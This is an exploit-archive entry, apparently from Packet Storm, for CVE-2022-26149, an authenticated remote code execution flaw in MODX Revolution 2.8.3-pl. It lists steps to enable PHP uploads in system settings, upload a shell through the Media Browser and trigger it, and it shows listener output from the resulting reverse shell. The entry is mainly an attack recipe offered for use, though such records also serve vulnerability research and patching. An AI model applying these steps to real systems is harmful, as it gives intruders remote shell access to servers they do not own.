Lucene search

K
packetstormSarang TumnePACKETSTORM:171488
HistoryMar 27, 2023 - 12:00 a.m.

MODX Revolution 2.8.3-pl Remote Code Execution

2023-03-2700:00:00
Sarang Tumne
packetstormsecurity.com
141
modx revolution
remote code execution
authenticated
cve-2022-26149
file upload
media browser

0.017 Low

EPSS

Percentile

87.9%

`# Exploit Title: MODX Revolution v2.8.3-pl - Authenticated Remote Code Execution  
# Exploit Author: Sarang Tumne @CyberInsane (Twitter: @thecyberinsane)   
# Date: 26th Feb'2022  
# CVE ID: CVE-2022-26149  
# Confirmed on release 2.8.3-pl  
# Reference: https://github.com/sartlabs/0days/blob/main/Modx/Exploit.txt  
# Vendor: https://modx.com/download  
  
###############################################  
#Step1- Login with Admin Credentials  
#Step2- Uploading .php files is disabled by default hence we need to abuse the functionality:  
Add the php file extension under the "Uploadable File Types" option available in "System Settings"   
#Step3- Now Goto Media=>Media Browser and upload the Shell.php  
#Step4- Now visit http://IP_Address/Shell.php and get the reverse shell:  
  
listening on [any] 4477 ...  
connect to [192.168.56.1] from (UNKNOWN) [192.168.56.130] 58056  
bash: cannot set terminal process group (1445): Inappropriate ioctl for device  
bash: no job control in this shell  
daemon@debian:/opt/bitnami/modx$  
  
`

0.017 Low

EPSS

Percentile

87.9%